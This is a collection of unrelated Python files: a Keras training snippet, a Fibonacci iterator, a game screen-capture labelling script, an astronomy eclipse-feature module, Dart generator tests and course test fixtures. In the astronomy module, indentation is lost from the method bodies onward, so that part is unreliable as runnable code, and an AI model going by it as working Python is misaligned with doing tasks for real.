    Hist2 = model2.fit(x_train, y_train, epochs=train_epochs1, batch_size=64, validation_data=(x_test, y_test))
    print(Hist2.history)
    # plot the combined training curves --------------------------------
    show_history_mse2(Hist, Hist2)
    model2.save('drive/app/' + model_name + '_model.h5')
    del x_train
    del y_train
    del x_test
    del y_test
    c = gc.collect()  # reclaim dataset memory
    print(c)
|
'''Fibonacci iterator'''
class Fib:
    '''iterator that yields numbers in the Fibonacci sequence'''

    def __init__(self, max):
        # Upper bound (inclusive) on the values produced.
        self.max = max

    def __iter__(self):
        # Restart the sequence each time iteration begins.
        self.a = 0
        self.b = 1
        return self

    def __next__(self):
        current = self.a
        if current > self.max:
            raise StopIteration
        self.a, self.b = self.b, self.a + self.b
        return current
# Copyright (c) 2009, Mark Pilgrim, All rights reserved.
#
# Redistribution and use in source and binary forms, with or without modification,
# are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS 'AS IS'
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
|
import cv2
import os
import time
# import matplotlib.pyplot as plt
from grabscreen import grab_screen
from getkeys import key_check
# Define keys/classes
# One-hot class vectors in the order [W, S, A, D, WA, WD, SA, SD, NOKEY].
# NOTE(review): keys_to_output() below returns class-name strings, so these
# vectors look unused in this script — confirm before removing.
w = [1,0,0,0,0,0,0,0,0]
s = [0,1,0,0,0,0,0,0,0]
a = [0,0,1,0,0,0,0,0,0]
d = [0,0,0,1,0,0,0,0,0]
wa = [0,0,0,0,1,0,0,0,0]
wd = [0,0,0,0,0,1,0,0,0]
sa = [0,0,0,0,0,0,1,0,0]
sd = [0,0,0,0,0,0,0,1,0]
nk = [0,0,0,0,0,0,0,0,1]
## ROI coordinates (screen-pixel bounds of the captured game region)
x1 = 273
x2 = 873
y1 = 638
y2 = 1238
def keys_to_output(keys):
    '''
    Map the list of currently pressed keys to a class-name string.

    Priority order: two-key combos (WA, WD, SA, SD) first, then single keys
    (W, S, A, D); anything else maps to "nk" (no key).

    Note: despite the original docstring, this returns the class name as a
    string (used as a dataset directory name), not a one-hot array.
    '''
    combos = (
        (('W', 'A'), "wa"),
        (('W', 'D'), "wd"),
        (('S', 'A'), "sa"),
        (('S', 'D'), "sd"),
        (('W',), "w"),
        (('S',), "s"),
        (('A',), "a"),
        (('D',), "d"),
    )
    for needed, name in combos:
        if all(k in keys for k in needed):
            return name
    return "nk"
# Average FPS = 56
def main():
    """Continuously grab the screen ROI, resize frames to 224x224 and save
    each one into the class directory named by the currently pressed keys.
    Pressing 'T' toggles pause/resume; the loop never exits on its own."""
    # session log
    # first sess = 0 - 9.970
    # second sess = 10.000 - 86.833
    # third sess = 87.000 -
    idx = 87000
    p = False
    # countdown so the user can focus the game window before capture starts
    for i in list(range(10))[::-1]:
        print(i + 1)
        time.sleep(1)
    print('Capturing starts.')
    # ave = 0
    # t1 = time.time()
    while(True):
        if not p:
            roi = grab_screen(region = (y1, x1, y2, x2))
            keys = key_check()
            roi = cv2.cvtColor(roi, cv2.COLOR_BGRA2BGR)
            roi = cv2.resize(roi, (224, 224))
            # print(roi)
            # plt.imshow(cv2.cvtColor(roi, cv2.COLOR_BGRA2RGB))
            # plt.show()
            class_name = keys_to_output(keys)
            path = 'C:/Users/mbura/Desktop/pycrewDataset/train/'+ class_name + '/{}.jpg'.format(idx)
            cv2.imwrite(path, roi)
            # t2 = time.time()
            # ave = t2-t1
            idx += 1
            # print("FPS: {}".format(idx/ave))
            time.sleep(.1)
        # poll again so 'T' can toggle pause even while paused
        keys = key_check()
        if 'T' in keys:
            if p:
                p = False
                print('Continue capturing.')
                time.sleep(1)
            else:
                print('Capturing is paused. ')
                p = True
                time.sleep(1)
main()
#!/usr/bin/env python
"""
eclipse_features -- generate a dict of features related to
classification of eclipsing systems
in pulsational variables
is_suspect Is there a reason not to trust the orbital period measurement?
p_pulse Pulsational period (dominant period found by LS)
feature-X-ratio-diff percent of sources more than X sigma fainter than model
relative to X sigma brighter (neg has more faint values)
x = [5,8,15,20,30]
best_orb_period best period found after removing the pulsational period
suspect_reason semicolon separated list why orb_period is suspect
best_orb_chi2 best chi2 fitting orb_period from polyfit
orb_signif LS significance
"""
# Module metadata.
__author__ = "J. S. Bloom, D. Starr"
__version__ = "0.32"
import os, sys
import numpy as np
from scipy.optimize import fmin
sys.path.append(os.path.abspath(os.environ.get("TCP_DIR") + \
'Algorithms/fitcurve'))
from lomb_scargle_refine import lomb as lombr
import copy
import selectp
from matplotlib import pylab as plt
def _load_ben_data(fname="LC_246.dat"):
    """loader for Ben's input files

    Parses the numeric id out of the file name (text between '_' and '.dat')
    and reads a space-delimited light curve with columns t, m, merr, rrl.
    returns (t, m, merr, name).

    NOTE(review): matplotlib.mlab.csv2rec was removed from modern matplotlib;
    this module targets a Python 2 era library stack.
    """
    from matplotlib.mlab import csv2rec
    ## Get the photometry
    name = str(int(fname[fname.find("_")+1:fname.find(".dat")]))
    c = csv2rec(fname,delimiter=" ",names=["t","m","merr","rrl"])
    x0 = c['t']
    y = c['m']
    dy = c['merr']
    return x0,y,dy, name
def _load_dotastro_data(fname="013113-7829.1.xml"):
    """loader for dotastro xml files

    Uses the project db_importer module (from $TCP_DIR) to parse the XML and
    returns (t, m, merr, name) numpy arrays for the first photometry key.

    NOTE(review): `kk[ind]` indexes dict.keys() directly — legal in Python 2,
    TypeError in Python 3 (dict_keys is not subscriptable).
    """
    sys.path.append(os.path.abspath(os.environ.get("TCP_DIR") + \
        'Software/feature_extract/Code'))
    import db_importer
    b = db_importer.Source(xml_handle=fname)
    kk = b.ts.keys()
    # take the first photometry band available
    ind = 0
    photkey = kk[ind]
    ts = b.ts
    x0 = np.array(ts[photkey]['t'])
    y = np.array(ts[photkey]['m'])
    dy = np.array(ts[photkey]['m_err'])
    name = fname.split(".xml")[0]
    return x0,y,dy, name
class ebfeature:
    def __init__(self,t=None, m=None, merr=None, name="", allow_plotting=True, sys_err=0.03, \
        verbose=False, fix_initial_period=False, initial_period=1.0, srcid=0):
        """Store the light curve (t, m, merr) plus configuration flags.

        sys_err is a systematic error added in quadrature to merr later;
        fix_initial_period/initial_period pin the pulsational period search.
        """
        self.allow_plotting = allow_plotting
        self.name = name
        self.t = t ; self.m = m ; self.merr = merr ; self.sys_err = sys_err
        self.verbose = verbose
        self.fix_initial_period=fix_initial_period ; self.initial_period = initial_period
        # "run" records whether the feature extraction has been executed
        self.features = {"run": False}
        self.srcid = srcid
def _get_pulsational_period(self,min_freq=10.0,doplot=False,max_pulse_period=400.0):
self.x0 = self.t
self.y = self.m
self.dy = self.merr
self.dy0 = np.sqrt(self.dy**2+self.sys_err**2)
self.x0 -= self.x0.min()
self.nepochs = len(self.x0)
# define the frequency grid
Xmax = self.x0.max()
if not self.fix_initial_period:
f0 = 1.0/max_pulse_period; df = 0.1/Xmax; fe = min_freq
numf = int((fe-f0)/df)
else:
f0 = 1./self.initial_period
df = 1e-7
numf = 1
psdr,res2 = lombr(self.x0,self.y,self.dy0,f0,df,numf,detrend_order=1)
period=1./res2['freq']
self.rrlp = period
if self.verbose:
print "Initial pulstional Period is %.8f day" % self.rrlp
self.features.update({"p_pulse_initial": self.rrlp})
if self.allow_plotting and doplot:
try:
plt.figure(3)
plt.cla()
tt=(self.x0/period) % 1.; s=tt.argsort()
plt.errorbar (tt,self.y,self.dy,fmt='o'); plt.plot(tt[s],res2['model'][s])
plt.ylim(self.y.max()+0.05,self.y.min()-0.05)
plt.title("P=%f" % (self.rrlp))
plt.draw()
except:
pass
return res2
def gen_outlier_stat_features(self,doplot=False,sig_features=[30,20,15,8,5],\
min_freq=10.0,dosave=True,max_pulse_period=400.0):
"""here we generate outlier features and refine the initial pulsational period
by downweighting those outliers.
"""
res2 = self._get_pulsational_period(doplot=doplot,min_freq=min_freq)
## now sigclip
offs = (self.y - res2['model'])/self.dy0
moffs = np.median(offs)
offs -= moffs
## do some feature creation ... find the statistics of major outliers
for i,s in enumerate(sig_features):
rr = (np.inf,s) if i == 0 else (sig_features[i-1],s)
tmp = (offs < rr[0]) & (offs > rr[1])
nlow = float(tmp.sum())/self.nepochs
tmp = (offs > -1*rr[0]) & (offs < -1*rr[1])
nhigh = float(tmp.sum())/self.nepochs
if self.verbose:
print "%i: low = %f high = %f feature-%i-ratio-diff = %f" % (s,nlow,nhigh,s,nhigh - nlow)
self.features.update({"feature-%i-ratio-diff" % s: (nhigh - nlow)*100.0})
tmp = np.where(abs(offs) > 4)
self.dy_orig = copy.copy(self.merr)
dy = copy.copy(self.merr)
dy[tmp] = np.sqrt(dy[tmp]**2 + res2['model_error'][tmp]**2 + (8.0*(1 - np.exp(-1.0*abs(offs[tmp])/4)))**2)
dy0 = np.sqrt(dy**2+self.sys_err**2)
#Xmax = self.x0.max()
#f0 = 1.0/max_pulse_period; df = 0.1/Xmax; fe = min_freq
#numf = int((fe-f0)/df)
#refine around original period
## Josh's original calcs, which fail for sources like: 221205
##df = 0.1/self.x0.max()
##f0 = res2['freq']*0.95
##fe = res2['freq']*1.05
##numf = int((fe-f0)/df)
df = 0.1/self.x0.max()
f0 = res2['freq']*0.95
fe = res2['freq']*1.05
numf = int((fe-f0)/df)
if numf == 0:
## Josh's original calcs, which fail for sources like: 221205
numf = 100 # kludge / fudge / magic number
df = (fe-f0) / float(numf)
psdr,res = lombr(self.x0,self.y,dy0,f0,df,numf,detrend_order=1)
period=1./res['freq']
self.features.update({"p_pulse": period})
if self.allow_plotting and doplot:
try:
tt=(self.x0*res2['freq']) % 1.; s=tt.argsort()
plt.errorbar (tt[tmp],self.y[tmp],self.dy_orig[tmp],fmt='o',c="r")
tt=(self.x0*res['freq']) % 1.; s=tt.argsort()
plt.plot(tt[s],res['model'][s],c="r")
if dosave:
plt.savefig("pulse-%s-p=%f.png" % (os.path.basename(self.name),period))
if self.verbose:
print "saved...", "pulse-%s-p=%f.png" % (os.path.basename(self.name),period)
plt.draw()
except:
pass
return offs, res2
def gen_orbital_period(self, doplot=False, sig_features=[30,20,15,8,5], min_eclipses=4,
eclipse_shorter=False, dynamic=True, choose_largest_numf=False):
"""
"""
try:
offs,res2 = self.gen_outlier_stat_features(doplot=doplot,sig_features=sig_features)
## subtract the model
new_y = self.y - res2['model']
# make new weights that penalize sources _near_ the model
dy0 = np.sqrt(self.dy_orig**2+ res2['model_error']**2 + (3*self.sys_err*np.exp(-1.0*abs(offs)/3))**2) ## this downweights data near the model
Xmax = self.x0.max()
#import pdb; pdb.set_trace()
#print
if choose_largest_numf:
f0 = min_eclipses/Xmax
df = 0.1/Xmax
fe = res2['freq']*0.98 ## dont go near fundamental freq least we find it again
numf = int((fe-f0)/df)
f0_b = res2['freq']*0.98
fe_b = 10.0
df_b = 0.1/Xmax
numf_b = int((fe_b-f0_b)/df_b)
if numf < numf_b:
f0 = f0_b
fe = fe_b
df = df_b
numf = numf_b
else:
if not eclipse_shorter:
f0 = min_eclipses/Xmax
df = 0.1/Xmax
fe = res2['freq']*0.98 ## dont go near fundamental freq least we find it again
numf = int((fe-f0)/df)
else:
f0 = res2['freq']*0.98
fe = 10.0
df = 0.1/Xmax
numf = int((fe-f0)/df)
freqin = f0 + df*np.arange(numf,dtype='float64')
periodin = 1/freqin
if self.verbose:
print "P min, max", min(periodin),max(periodin)
psdr,res2 = lombr(self.x0,new_y,self.dy0,f0,df,numf)
period=1./res2['freq']
if self.verbose:
print "orb period = %f sigf = %f" % (period,res2['signif'])
self.last_res = res2
s = selectp.selectp(self.x0, new_y, self.dy_orig, period, mults=[1.0,2.0], dynamic=dynamic, verbose=self.verbose, srcid=self.srcid)
s.select()
self.features.update({"best_orb_period": s.rez['best_period'], "best_orb_chi2": \
s.rez['best_chi2'], 'orb_signif': res2['signif']})
is_suspect = False
reason = []
if abs(1.0 - self.features['best_orb_period']) < 0.01 or abs(2.0 - self.features['best_orb_period']) < 0.01 or \
abs(0.5 - self.features['best_orb_period']) < 0.01:
## likely an alias
is_suspect=True
reason.append("alias")
if self.features['best_orb_chi2'] > 10.0 or self.features['orb_signif'] < 4:
is_suspect=True
reason.append("low significance")
if self.features['best_orb_period'] > Xmax/(2*min_eclipses):
## probably too long
is_suspect=True
reason.append("too long")
if (0.5 - abs( (self.features['best_orb_period'] / self.features['p_pulse']) % 1.0 - 0.5)) < 0.01:
## probably an alias of the pulse period
is_suspect=True
reason.append("pulse alias")
self.features.update({'is_suspect': is_suspect, 'suspect_reason': None if not is_suspect else \
"; ".join(reason)})
if doplot:
try:
plt.figure(2)
plt.cla()
s.plot_best(extra="suspect=%s %s" % (is_suspect,"" if not is_suspect else "(" + ",".join(reason) + ")"))
plt.savefig("orb-%s-p=%f-sig=%f.png" % (os.path.basename(self.name),period,res2['signif']))
if self.verbose:
print "saved...", "org-%s-p=%f.png" % (os.path.basename(self.name),period)
except:
pass
except:
return
def old_stuff(self):
print res2['chi2'], res2['chi0']
if self.verbose:
print "New Period is %.8f day" % period
plt.figure(2)
plt.cla()
tt=(self.x0/period) % 1.; s=tt.argsort()
plt.errorbar (tt[s],new_y[s],self.dy_orig[s],fmt='o',c="b")
plt.plot(tt[s],res2['model'][s],c="r")
f = open("lc.dat","w")
z = zip(tt[s] - 0.5,new_y[s],self.dy_orig[s])
for l in z:
f.write("%f %f %f\n" % l)
f.close()
f = open("lc0.dat","w")
z = zip(self.x0,new_y,self.dy_orig)
for l in z:
f.write("%f %f %f\n" % l)
f.close()
psdr,res2 = lombr(self.x0,new_y,self.dy0,f0/2.,df,numf)
period1=1./res2['freq']
if self.verbose:
print "New Period is %.8f day" % period1
plt.figure(4)
plt.cla()
tt=(self.x0/period1) % 1.; s=tt.argsort()
plt.errorbar (tt[s],new_y[s],self.dy_orig[s],fmt='o',c="b")
plt.plot(tt[s],res2['model'][s],c="r")
print res2['chi2'], res2['chi0']
f = open("lc2.dat","w")
z = zip(tt[s] - 0.5,new_y[s],self.dy_orig[s])
for l in z:
f.write("%f %f %f\n" % l)
f.close()
def runben(doplot=False):
    """Batch-run feature generation over Ben's LCnew_??.dat light curves,
    appending one CSV row per source to benfeatures.csv.  Resumable:
    sources whose name already appears in the CSV are skipped."""
    import glob
    from matplotlib.mlab import csv2rec
    import numpy as np
    l = glob.glob("/Users/jbloom/Dropbox/LCS/LCnew_??.dat")
    if os.path.exists("benfeatures.csv"):
        ttt = csv2rec("benfeatures.csv")
        header=False
    else:
        header=True
        # sentinel record so the name-membership test below is well-formed
        ttt = np.rec.fromarrays([-1],names='name',formats='i4')
    m = open("benfeatures.csv","a")
    has_run = False
    for f in l:
        if f.find(".dat") != -1:
            fname = f
            print "working on", f
            x0,y,dy, name =_load_ben_data(fname)
            if len(np.where(ttt['name'] == int(os.path.basename(name)))[0]) != 0:
                print "... already in list, skipping"
                continue
            a = ebfeature(t=x0,m=y,merr=dy,name=name)
            a.gen_orbital_period(doplot=doplot)
            if doplot:
                plt.draw()
            if not has_run:
                # derive the CSV column order from the first source's keys
                ff = a.features.keys()
                ff.remove("run")
                ff.remove("p_pulse_initial")
                if header:
                    m.write("name," + ",".join(ff) + "\n")
                has_run = True
            m.write(os.path.basename(name) + "," + ",".join([str(a.features.get(s)) for s in ff]) + "\n")
    m.close()
def runcand(doplot=False):
    """Run feature generation over every dotastro XML file in BenLike/,
    writing one CSV row per source to features.csv (overwrites)."""
    import time
    l = os.listdir("BenLike/")
    m = open("features.csv","w")
    has_run = False
    for f in l:
        if f.find(".xml") != -1:
            fname = "BenLike/" + f
            print "working on", f
            x0,y,dy, name = _load_dotastro_data(fname)
            a = ebfeature(t=x0,m=y,merr=dy,name=name)
            a.gen_orbital_period(doplot=doplot)
            if doplot:
                plt.draw()
            if not has_run:
                # header row from the first source's feature keys
                ff = a.features.keys()
                ff.remove("run")
                ff.remove("p_pulse_initial")
                m.write("name," + ",".join(ff) + "\n")
                has_run = True
            m.write(os.path.basename(name) + "," + ",".join([str(a.features.get(s)) for s in ff]) + "\n")
            # brief pause between sources (rate-limits plotting/IO)
            time.sleep(1)
    m.close()
def test():
    """This is a test to show how to use Ben's input files (t, m, merr)"""
    x0,y,dy, name = _load_ben_data()
    # NOTE(review): deliberately drops into the debugger before running
    import pdb; pdb.set_trace()
    print
    # known pulsational period supplied, so the initial search is skipped
    a = ebfeature(t=x0,m=y,merr=dy,fix_initial_period=True,initial_period=0.4422664540092584,name=name)
    a.gen_orbital_period(doplot=True)
    print a.features
def test2():
    """This is a test to show how to use doastro xml files"""
    x0,y,dy, name = _load_dotastro_data()
    # note: if you already know the pulsational period, see test() above for
    # ebfeature instantiation
    a = ebfeature(t=x0,m=y,merr=dy,name=name)
    a.gen_orbital_period(doplot=True)
    print a.features
if __name__ == '__main__':
    ### this section is just for testing
    # using t, m, merr:
    test()
    # NOTE(review): intentionally pauses in the debugger between the two demos
    import pdb; pdb.set_trace()
    print
    ### using xml file:
    test2()
|
#!/usr/bin/env python3
# Copyright (c) 2012, the Dart project authors. Please see the AUTHORS file
# for details. All rights reserved. Use of this source code is governed by a
# BSD-style license that can be found in the LICENSE file.
"""Tests for dartgenerator."""
import logging.config
import os.path
import re
import shutil
import tempfile
import unittest
import dartgenerator
import database
import idlnode
import idlparser
class DartGeneratorTestCase(unittest.TestCase):
    """End-to-end tests for dartgenerator: build a small IDL database in a
    temp directory, run the generator, and inspect the emitted .dart files."""

    def _InDatabase(self, interface_name):
        # True if the interface's .idl file exists in the test database.
        return os.path.exists(
            os.path.join(self._database_dir, '%s.idl' % interface_name))

    def _FilePathForDartInterface(self, interface_name):
        # Path of the generated Dart interface file for interface_name.
        return os.path.join(self._generator._output_dir, 'src', 'interface',
                            '%s.dart' % interface_name)

    def _InOutput(self, interface_name):
        # True if the generator produced a .dart file for the interface.
        return os.path.exists(self._FilePathForDartInterface(interface_name))

    def _ReadOutputFile(self, interface_name):
        """Return (content, path) of the generated file; fails if missing."""
        self.assertTrue(self._InOutput(interface_name))
        file_path = self._FilePathForDartInterface(interface_name)
        f = open(file_path, 'r')
        content = f.read()
        f.close()
        return content, file_path

    def _AssertOutputSansHeaderEquals(self, interface_name, expected_content):
        """Assert the generated file equals expected_content once leading
        license/header comments have been stripped."""
        full_actual_content, file_path = self._ReadOutputFile(interface_name)
        # Remove file header comments in // or multiline /* ... */ syntax.
        header_re = re.compile(r'^(\s*(//.*|/\*([^*]|\*[^/])*\*/)\s*)*')
        actual_content = header_re.sub('', full_actual_content)
        if expected_content != actual_content:
            msg = """
FILE: %s
EXPECTED:
%s
ACTUAL:
%s
""" % (file_path, expected_content, actual_content)
            self.fail(msg)

    def _AssertOutputContains(self, interface_name, expected_content):
        """Assert expected_content is a substring of the generated file."""
        actual_content, file_path = self._ReadOutputFile(interface_name)
        if expected_content not in actual_content:
            msg = """
STRING: %s
Was found not in output file: %s
FILE CONTENT:
%s
""" % (expected_content, file_path, actual_content)
            self.fail(msg)

    def _AssertOutputDoesNotContain(self, interface_name, expected_content):
        """Assert expected_content is NOT a substring of the generated file."""
        actual_content, file_path = self._ReadOutputFile(interface_name)
        if expected_content in actual_content:
            msg = """
STRING: %s
Was found in output file: %s
FILE CONTENT:
%s
""" % (expected_content, file_path, actual_content)
            self.fail(msg)

    def setUp(self):
        # Fresh temp working tree per test: output/, database/, auxiliary/.
        self._working_dir = tempfile.mkdtemp()
        self._output_dir = os.path.join(self._working_dir, 'output')
        self._database_dir = os.path.join(self._working_dir, 'database')
        self._auxiliary_dir = os.path.join(self._working_dir, 'auxiliary')
        self.assertFalse(os.path.exists(self._database_dir))
        # Create database and add one interface.
        db = database.Database(self._database_dir)
        os.mkdir(self._auxiliary_dir)
        self.assertTrue(os.path.exists(self._database_dir))
        # Three modules exercising annotations, inheritance, qualified and
        # unidentifiable types, and templated parameters.
        content = """
module shapes {
  @A1 @A2
  interface Shape {
    @A1 @A2 getter attribute int attr;
    @A1 setter attribute int attr;
    @A3 boolean op();
    const long CONSTANT = 1;
    getter attribute DOMString strAttr;
    Shape create();
    boolean compare(Shape s);
    Rectangle createRectangle();
    void addLine(lines::Line line);
    void someDartType(File file);
    void someUnidentifiedType(UnidentifiableType t);
  };
};

module rectangles {
  @A3
  interface Rectangle : @A3 shapes::Shape {
    void someTemplatedType(List<Shape> list);
  };
};

module lines {
  @A1
  interface Line : shapes::Shape {
  };
};
"""
        parser = idlparser.IDLParser(idlparser.FREMONTCUT_SYNTAX)
        ast = parser.parse(content)
        idl_file = idlnode.IDLFile(ast)
        for interface in idl_file.interfaces:
            db.AddInterface(interface)
        db.Save()
        self.assertTrue(self._InDatabase('Shape'))
        self.assertTrue(self._InDatabase('Rectangle'))
        self.assertTrue(self._InDatabase('Line'))
        self._database = database.Database(self._database_dir)
        self._generator = dartgenerator.DartGenerator(self._auxiliary_dir,
                                                      '../templates', 'test')

    def tearDown(self):
        # NOTE(review): only database/ and auxiliary/ are removed; the
        # temp working dir and output/ are left behind -- confirm intended.
        shutil.rmtree(self._database_dir)
        shutil.rmtree(self._auxiliary_dir)

    def testBasicGeneration(self):
        # Generate all interfaces:
        self._database.Load()
        self._generator.Generate(self._database, self._output_dir)
        self._generator.Flush()
        self.assertTrue(self._InOutput('Shape'))
        self.assertTrue(self._InOutput('Rectangle'))
        self.assertTrue(self._InOutput('Line'))

    def testFilterByAnnotations(self):
        self._database.Load()
        self._generator.FilterInterfaces(self._database, ['A1', 'A2'], ['A3'])
        self._generator.Generate(self._database, self._output_dir)
        self._generator.Flush()
        # Only interfaces with (@A1 and @A2) or @A3 should be generated:
        self.assertTrue(self._InOutput('Shape'))
        self.assertTrue(self._InOutput('Rectangle'))
        self.assertFalse(self._InOutput('Line'))
        # Only members with (@A1 and @A2) or @A3 should be generated:
        # TODO(sra): make th
        self._AssertOutputSansHeaderEquals(
            'Shape', """interface Shape {

  final int attr;

  bool op();
}
""")
        self._AssertOutputContains('Rectangle',
                                   'interface Rectangle extends shapes::Shape')

    def testTypeRenames(self):
        self._database.Load()
        # Translate 'Shape' to spanish:
        self._generator.RenameTypes(self._database, {'Shape': 'Forma'}, False)
        self._generator.Generate(self._database, self._output_dir)
        self._generator.Flush()
        # Validate that all references to Shape have been converted:
        self._AssertOutputContains('Forma', 'interface Forma')
        self._AssertOutputContains('Forma', 'Forma create();')
        self._AssertOutputContains('Forma', 'bool compare(Forma s);')
        self._AssertOutputContains('Rectangle',
                                   'interface Rectangle extends Forma')

    def testQualifiedDartTypes(self):
        self._database.Load()
        self._generator.FilterMembersWithUnidentifiedTypes(self._database)
        self._generator.Generate(self._database, self._output_dir)
        self._generator.Flush()
        # Verify primitive conversions are working:
        self._AssertOutputContains('Shape', 'static const int CONSTANT = 1')
        self._AssertOutputContains('Shape', 'final String strAttr;')
        # Verify interface names are converted:
        self._AssertOutputContains('Shape', 'interface Shape {')
        self._AssertOutputContains('Shape', ' Shape create();')
        # TODO(sra): Why is this broken? Output contains qualified type.
        #self._AssertOutputContains('Shape',
        #                           'void addLine(Line line);')
        self._AssertOutputContains('Shape', 'Rectangle createRectangle();')
        # TODO(sra): Why is this broken? Output contains qualified type.
        #self._AssertOutputContains('Rectangle',
        #                           'interface Rectangle extends Shape')
        # Verify dart names are preserved:
        # TODO(vsm): Re-enable when package / namespaces are enabled.
        # self._AssertOutputContains('shapes', 'Shape',
        #                            'void someDartType(File file);')
        # Verify that unidentified types are not removed:
        self._AssertOutputDoesNotContain('Shape', 'someUnidentifiedType')
        # Verify template conversion:
        # TODO(vsm): Re-enable when core collections are supported.
        # self._AssertOutputContains('rectangles', 'Rectangle',
        #                            'void someTemplatedType(List<Shape> list)')
if __name__ == '__main__':
    # Fix: the guard was duplicated (two consecutive identical `if
    # __name__` blocks); merged into one. Configure logging, then hand
    # off to the unittest runner.
    logging.config.fileConfig('logging.conf')
    unittest.main()
|
"""
CSC148, Winter 2019
Assignment 1
Task 1 Tests
"""
import datetime
import pytest
from typing import List, Dict, Union
from application import create_customers, process_event_history
from customer import Customer
from contract import TermContract, MTMContract, PrepaidContract
from phoneline import PhoneLine
from task1_tests import create_customers_log
# Test fixture data: 15 phone numbers; the 4-digit suffix doubles as a
# customer id and as the key into the `loc` location map below.
phone_numbers = ['100-1200', '200-1200', '010-1020', '020-1020',
                 '001-1002', '002-1002', '100-2110', '010-2110',
                 '010-2011', '001-2011', '100-2101', '001-2101',
                 '100-3111', '010-3111', '001-3111']
# Three longitudes (x1..x3) and three latitudes (y1..y3) used to place calls.
x1 = -79.572504
x2 = -79.44713
x3 = -79.321756
y1 = 43.743916
y2 = 43.688264
y3 = 43.632611
# Map each number suffix to its (longitude, latitude) call location.
loc = {1200: (x1, y1), 1020: (x2, y1), 1002: (x3, y1),
       2110: (x1, y2), 2011: (x2, y2), 2101: (x3, y2),
       3111: (x2, y3)}
def create_log() -> Dict[str, List[Dict]]:
    """Build a synthetic event log for the contract tests.

    For each of three monthly dates, every phone number calls every other
    number; per-line call counts and durations are tuned to exercise
    specific contract behaviours (see the inline Term/MTM/PrePaid notes).
    Returns {'events': [...], 'customers': [...]}.
    """
    log = {}
    log['events'] = []
    event = {}
    dates = ["2018-11-01", "2018-12-01", "2019-01-01"]
    for i in range(3):
        call_number = 1
        # lines capped at a small number of scripted-duration calls
        three_calls_only = ['100-1200', '001-2101', '001-3111', '001-2011']
        #Term, PrePaid, PrePaid
        for src_phone in phone_numbers:
            num_calls = 0
            max_calls = 14
            # dur_lst[month][call] = duration in minutes for scripted lines
            dur_lst = [[], [], []]
            if src_phone == '100-1200': #Term
                max_calls = 3
                dur_lst = [[20, 30, 40], [50, 10, 40], [50, 60, 40]]
            elif src_phone == '010-1020': #MTM
                for j in range(14):
                    dur_lst[0].append(10 * j)
                    dur_lst[1].append(20 * j)
                    dur_lst[2].append(30 * j)
            elif src_phone == '001-2101': #PrePaid
                max_calls = 3
                dur_lst = [[169, 800, 31], [1000, 931, 69], [500, 469, 531]]
            elif src_phone == '001-3111': #PrePaid
                max_calls = 3
                dur_lst = [[69, 11, 20], [20, 10, 20], [69, 69, 12]]
            elif src_phone == '001-2011': #PrePaid
                max_calls = 3
                dur_lst = [[250, 50, 200], [50, 50, 900], [50, 25, 25]]
            for dst_phone in phone_numbers:
                if src_phone != dst_phone:
                    dur = 60  # default duration (seconds) for uncapped lines
                    if (src_phone in three_calls_only) and num_calls >= max_calls:
                        break
                    elif src_phone in three_calls_only:
                        dur = dur_lst[i][num_calls] * 60
                        num_calls += 1
                    elif src_phone == '200-1200' or src_phone == '100-2101':
                        dur = 65 #Term
                    elif src_phone == '100-3111':
                        dur = 10 * 60 #Term
                    elif src_phone == '010-1020':
                        dur = dur_lst[i][num_calls] * 60 #MTM
                        num_calls += 1
                    # encode the running call counter as an mm:ss timestamp
                    # (NOTE: `min` shadows the builtin within this loop)
                    sec = str(call_number % 60)
                    min = str(call_number // 60)
                    if len(sec) == 1:
                        sec = '0' + sec
                    if len(min) == 1:
                        min = '0' + min
                    event['type'] = 'call'
                    event['src_number'] = src_phone
                    event['dst_number'] = dst_phone
                    event['time'] = f'{dates[i]} 01:{min}:{sec}'
                    event['duration'] = dur
                    event['src_loc'] = loc[int(src_phone[4:])]
                    event['dst_loc'] = loc[int(dst_phone[4:])]
                    # copy: `event` is reused as a scratch dict each iteration
                    log['events'].append(event.copy())
                    call_number += 1
    log['customers'] = create_customers_log()
    return log
def create_customers(log: Dict[str, List[Dict]]) -> List[Customer]:
    """ Returns a list of Customer instances for each customer from the input
    dataset from the dictionary <log>.

    Precondition:
    - The <log> dictionary contains the input data in the correct format,
    matching the expected input format described in the handout.

    NOTE(review): this deliberately shadows the create_customers imported
    from application, substituting contracts with test-specific dates.
    """
    customer_list = []
    for cust in log['customers']:
        customer = Customer(cust['id'])
        for line in cust['lines']:
            contract = None
            # specific numbers get hand-picked contract dates/credits so the
            # tests below can exercise free minutes, cancellation timing and
            # positive/negative prepaid balances
            if line['number'] == '100-1200': #Term: Test Free Min
                contract = TermContract(datetime.date(2018, 11, 1), datetime.date(2019, 1, 1))
            elif line['number'] == '200-1200': #Term: Test Cancel After
                contract = TermContract(datetime.date(2018, 11, 1), datetime.date(2018, 12, 1))
            elif line['number'] == '100-2101': #Term: Test Cancel On
                contract = TermContract(datetime.date(2018, 11, 1),
                                        datetime.date(2019, 1, 25))
            elif line['number'] == '100-3111': #Term: Test Cancel Before
                contract = TermContract(datetime.date(2018, 11, 1),
                                        datetime.date(2019, 2, 1))
            elif line['number'] == '001-2101': #Prepaid: positive balance
                contract = PrepaidContract(datetime.date(2018, 11, 1), 25)
            elif line['number'] == '001-3111': # Prepaid: negative balance
                contract = PrepaidContract(datetime.date(2018, 11, 1), 25)
